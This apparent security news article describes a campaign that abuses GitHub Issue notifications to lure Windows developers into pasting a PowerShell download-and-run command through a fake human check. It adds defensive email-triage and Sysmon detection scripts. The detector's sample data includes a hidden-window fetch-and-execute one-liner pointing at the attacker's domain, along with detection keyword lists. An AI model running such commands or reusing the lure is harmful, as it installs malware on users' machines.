GitHub Notifications Exploited to Spread Malware

Malicious actors have developed a new method of sending deceptive emails posing as the GitHub Security team. These emails target developers on the Windows platform and urge them to take actions that ultimately lead to malware being installed on their systems. The concerning aspect of this tactic is that the emails are genuinely sent from GitHub's own mail servers, so they pass as authentic notifications unless examined carefully.

The attackers start the distribution by posting a message in the "Issues" section of a repository, claiming to have identified a security problem. Instead of detailing any vulnerability, the post contains text styled to look as if it came from the GitHub Security Team. Developers associated with the project receive the standard email notification about a new Issue, which gives the impression of a communication directly from GitHub. To avoid raising suspicion on the GitHub page itself, the fabricated Issue is promptly deleted.
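Because the lure arrives as an ordinary Issue notification, it carries the same metadata as every other activity notification GitHub sends, and that metadata is what a mail filter can key on. The following triage script is an added example, not code from the article or from GitHub: it assumes that GitHub's activity notifications carry `X-GitHub-Sender` and `X-GitHub-Reason` headers (both assumed here), treats a notification that is authored by a user account but claims to be from the Security Team as suspicious, and lists every link that points away from GitHub's own domains. Both sample emails are constructed; the sender account and repository names are placeholders.

```python
import email
import re
from email import policy
from urllib.parse import urlparse

# Hosts a genuine GitHub notification may legitimately link to (assumption).
TRUSTED_HOSTS = ("github.com", "githubusercontent.com")

# Wording of the lure: an Issue post claiming to come from GitHub staff.
IMPERSONATION_PHRASES = ("github security team", "security team at github")


def host_is_trusted(host):
    host = (host or "").lower()
    return any(host == h or host.endswith("." + h) for h in TRUSTED_HOSTS)


def extract_urls(text):
    # Crude URL extraction; trailing punctuation is stripped.
    return [u.rstrip(".,;:)>'\"") for u in re.findall(r"https?://\S+", text)]


def triage_notification(raw):
    """Return a verdict and the reasons for it for one raw notification email."""
    msg = email.message_from_string(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("plain",)).get_content()
    reasons = []

    # X-GitHub-Reason marks an activity notification (Issue, comment, mention),
    # i.e. content written by a GitHub *user*, never by GitHub itself (assumption).
    is_activity = msg.get("X-GitHub-Reason") is not None
    lowered = body.lower()
    if is_activity and any(p in lowered for p in IMPERSONATION_PHRASES):
        reasons.append(
            "activity notification from user %s claims to be GitHub staff"
            % msg.get("X-GitHub-Sender")
        )

    # Any link that leaves GitHub's own domains is where the lure sends the reader.
    for url in extract_urls(body):
        host = urlparse(url).hostname
        if not host_is_trusted(host):
            reasons.append("link to non-GitHub host %s" % host)

    return {"verdict": "suspicious" if reasons else "ok", "reasons": reasons}


# Constructed sample of the lure (sender account and repository are placeholders).
LURE_EMAIL = """\
From: GitHub <notifications@github.com>
To: dev@example.com
Subject: [example-org/example-repo] Important security notice (Issue #1)
X-GitHub-Sender: attacker-account-placeholder
X-GitHub-Reason: subscribed
List-Id: example-org/example-repo <example-repo.example-org.github.com>
Content-Type: text/plain; charset=utf-8

This is the GitHub Security Team. We detected a security vulnerability
in your repository. Please verify your account at https://github-scanner.com

-- Reply to this email directly or view it on GitHub:
https://github.com/example-org/example-repo/issues/1
"""

# Constructed sample of an ordinary, benign Issue notification.
BENIGN_EMAIL = """\
From: GitHub <notifications@github.com>
To: dev@example.com
Subject: [example-org/example-repo] Build fails on Windows (Issue #2)
X-GitHub-Sender: colleague-placeholder
X-GitHub-Reason: subscribed
Content-Type: text/plain; charset=utf-8

The test suite fails on Windows with the latest commit, see the CI log:
https://github.com/example-org/example-repo/actions

-- Reply to this email directly or view it on GitHub:
https://github.com/example-org/example-repo/issues/2
"""

if __name__ == "__main__":
    for name, raw in (("lure", LURE_EMAIL), ("benign", BENIGN_EMAIL)):
        print(name, triage_notification(raw))
```

The two checks are deliberately independent: a notification that only links off-site is still reported, and one that impersonates staff without any link is still reported, so deleting the Issue afterwards (as the attackers do) does not help them on the mail side.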

The email instructs recipients to find more information about the alleged problem on a fake website, Github-scanner.com, created by the attackers. The site uses a cunning and deceptive method to trick users into downloading and executing malicious software themselves. On visiting the site, users encounter a confirmation request that appears to verify that they are human rather than a bot. The request asks them to agree to a check and then press specific key combinations: "Windows+R", "Ctrl+V", and Enter. Clicking the Consent button silently copies a PowerShell command that downloads and runs the malware to the clipboard; the key combinations then open the Windows Run dialog (Windows+R), paste the command from the clipboard (Ctrl+V), and execute it (Enter).
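The clipboard trick leaves a distinctive trace on the endpoint: a PowerShell process whose parent is explorer.exe (the Run dialog is hosted by Explorer, an assumption about the telemetry made here) and whose command line downloads and executes remote content. The following detection is an added example, not code from the article or from any vendor; it scans process-creation records in the field layout Sysmon event 1 exports (field names `Image`, `ParentImage`, `CommandLine`, `User`, `UtcTime` assumed) and reports only the combination of those three signals, so an interactive shell opened from the Run dialog or a CI script launched from cmd.exe is not flagged. The sample events are constructed; the URL path is a placeholder.

```python
import json

# PowerShell binaries (assumption: pwsh.exe covers PowerShell 7 installs).
POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe")

# Fragments typical of a one-liner that fetches and runs remote code.
DOWNLOAD_CUES = ("invoke-webrequest", "iwr ", "downloadstring", "downloadfile",
                 "invoke-expression", "iex ", "-encodedcommand", "frombase64string")

# Flags that hide the console window from the victim.
HIDDEN_CUES = ("-w hidden", "-windowstyle hidden")


def classify(event):
    """Return an alert dict if the event looks like a Run-dialog download one-liner."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "").lower()
    if not image.endswith(POWERSHELL_IMAGES):
        return None
    # Win+R opens the Run dialog, which explorer.exe hosts, so the shell it
    # spawns has explorer.exe as its parent (assumption about the telemetry).
    if not parent.endswith("\\explorer.exe"):
        return None
    cues = [c.strip() for c in DOWNLOAD_CUES if c in cmd]
    if not cues:
        return None
    return {
        "time": event.get("UtcTime"),
        "user": event.get("User"),
        "hidden_window": any(h in cmd for h in HIDDEN_CUES),
        "cues": cues,
        "command": event.get("CommandLine"),
    }


def scan_events(jsonl):
    """Run classify() over newline-delimited JSON records and collect the alerts."""
    alerts = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        alert = classify(json.loads(line))
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample telemetry: one Run-dialog one-liner, one interactive shell
# opened from the Run dialog, one build script from cmd.exe, one unrelated process.
SAMPLE_EVENTS = r"""
{"UtcTime": "2024-09-19 10:02:11", "User": "CORP\\dev1", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -c \"Invoke-WebRequest https://github-scanner.com/PLACEHOLDER | Invoke-Expression\""}
{"UtcTime": "2024-09-19 10:05:40", "User": "CORP\\dev2", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell"}
{"UtcTime": "2024-09-19 10:07:03", "User": "CORP\\build", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "CommandLine": "pwsh -File C:\\build\\fetch-deps.ps1"}
{"UtcTime": "2024-09-19 10:09:58", "User": "CORP\\dev1", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe"}
"""

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(json.dumps(alert, indent=2))
```

The parent-process condition is what separates this from a generic "PowerShell downloads something" rule, which would fire constantly in a developer environment; conversely, a real Run-dialog one-liner has no reason to exist in normal use, so the few hits this produces are worth a human look.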